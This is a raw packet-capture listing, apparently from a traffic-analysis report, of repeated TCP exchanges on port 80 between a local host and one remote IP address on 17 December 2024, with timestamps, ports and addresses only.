                                                                                                                                                                                                                      Dec 17, 2024 10:15:07.591099977 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:07.591152906 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:07.591979027 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:07.592083931 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:07.592096090 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:07.592963934 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:07.593065023 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:07.593105078 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:07.593889952 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:07.593960047 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:07.594053030 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:07.594852924 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:07.594924927 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:07.595096111 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:07.595817089 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:07.595905066 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:07.595910072 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:07.596756935 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:07.596859932 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:07.596972942 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:07.597668886 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:07.597742081 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:07.597793102 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:07.598655939 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:07.598788023 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:07.598795891 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:07.599620104 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:07.599739075 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:07.599749088 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:07.600622892 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:07.600713015 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:07.600712061 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:07.601497889 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:07.601552963 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:07.601572990 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:07.602442980 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:07.602562904 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:07.602646112 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:07.603609085 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:07.603648901 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:07.603682995 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:07.604361057 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:07.604441881 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:07.604454041 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:07.605298996 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:07.605412960 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:07.605420113 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:07.606261969 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:07.606312990 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:07.606323957 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:07.607206106 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:07.607332945 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:07.607367992 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:07.608165026 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:07.608253002 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:07.608258963 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:07.609211922 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:07.609283924 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:07.609528065 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:07.661951065 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:07.752217054 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:07.752312899 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:07.752388000 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:07.752430916 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:07.752449989 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:07.753304005 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:07.753420115 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:07.753496885 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:07.753496885 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:07.754245043 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:07.754364014 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:07.754678011 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:07.755203009 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:07.755352974 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:07.755538940 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:07.756192923 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:07.756266117 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:07.756351948 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:07.757102966 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:07.757205009 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:07.757953882 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:07.758090973 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:07.758176088 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:07.758369923 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:07.758997917 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:07.759131908 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:07.759306908 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:07.759970903 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:07.760087013 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:07.760169029 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:07.760992050 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:07.761101007 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:07.761221886 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:07.761862993 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:07.761970043 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:07.762109995 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:07.762851954 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:07.762991905 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:07.763118982 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:07.763777018 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:07.763860941 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:07.763941050 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:07.764733076 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:07.764796019 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:07.764873028 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:07.765737057 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:07.765827894 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:07.765949011 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:07.766628981 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:07.766771078 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:07.766917944 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:07.767620087 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:07.767733097 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:07.767884016 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:07.768524885 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:07.768639088 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:07.768714905 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:07.769493103 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:07.769577980 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:07.769678116 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:07.770467997 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:07.770524025 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:07.770770073 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:07.771380901 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:07.771477938 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:07.771752119 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:07.772320986 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:07.772455931 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:07.772536993 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:07.773277044 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:07.773466110 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:07.773601055 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:07.774240017 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:07.774367094 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:07.774528980 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:07.775227070 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:07.775310993 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:07.775464058 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:07.776155949 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:07.776273966 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:07.776400089 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:07.777127981 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:07.777175903 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:07.777256966 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:07.778165102 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:07.778266907 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:07.778362989 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:07.779031038 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:07.779146910 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:07.779336929 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:07.779947042 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:07.780075073 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:07.780158997 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:07.780916929 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:07.781048059 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:07.781125069 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:07.781889915 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:07.781969070 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:07.782100916 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:07.782877922 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:07.782994032 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:07.783329010 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:07.783771038 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:07.783813000 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:07.784712076 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:07.784820080 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:07.784884930 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:07.784884930 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:07.785662889 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:07.785767078 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:07.785840034 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:07.786618948 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:07.786731958 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:07.786812067 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:07.787587881 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:07.787657976 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:07.787729979 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:07.788507938 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:07.788649082 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:07.788829088 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:07.789485931 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:07.789658070 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:07.789729118 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:07.790421009 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:07.790525913 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:07.790599108 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:07.791429996 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:07.791544914 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:07.791615009 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:07.792356968 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:07.792546988 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:07.792623043 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:07.793354988 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:07.793504000 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:07.793581963 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:07.794219971 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:07.794348955 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:07.795178890 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:07.795272112 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:07.795348883 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:07.795348883 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:07.796175957 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:07.796334982 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:07.797082901 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:07.797312975 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:07.797447920 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:07.797950029 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:07.798106909 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:07.798238993 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:07.798310995 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:07.799017906 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:07.799154997 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:07.799226999 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:07.799974918 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:07.800195932 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:07.800266027 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:07.800901890 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:07.801001072 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:07.801074028 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:07.801827908 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:07.847951889 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:07.944520950 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:07.944574118 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:07.944694042 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:07.944948912 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:07.945055962 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:07.945142984 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:07.945852995 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:07.945944071 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:07.946129084 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:07.946793079 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:07.946913958 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:07.946993113 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:07.947742939 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:07.947843075 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:07.948193073 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:07.948693037 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:07.948841095 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:07.949031115 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:07.949642897 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:07.949793100 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:07.949954033 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:07.950680017 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:07.950746059 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:07.950830936 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:07.951540947 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:07.951678038 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:07.951853991 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:07.952495098 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:07.952629089 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:07.952893019 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:07.953455925 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:07.953567982 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:07.953654051 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:07.954397917 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:07.954516888 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:07.954606056 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:07.955389023 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:07.955504894 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:07.955576897 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:07.956329107 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:07.956460953 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:07.956640005 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:07.957276106 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:07.957374096 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:07.957557917 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:07.958223104 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:07.958276987 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:07.958376884 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:07.959187031 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:07.959259987 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:07.960145950 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:07.960246086 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:07.960349083 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:07.960349083 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:07.961191893 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:07.961280107 CET8049709185.81.68.147192.168.2.8
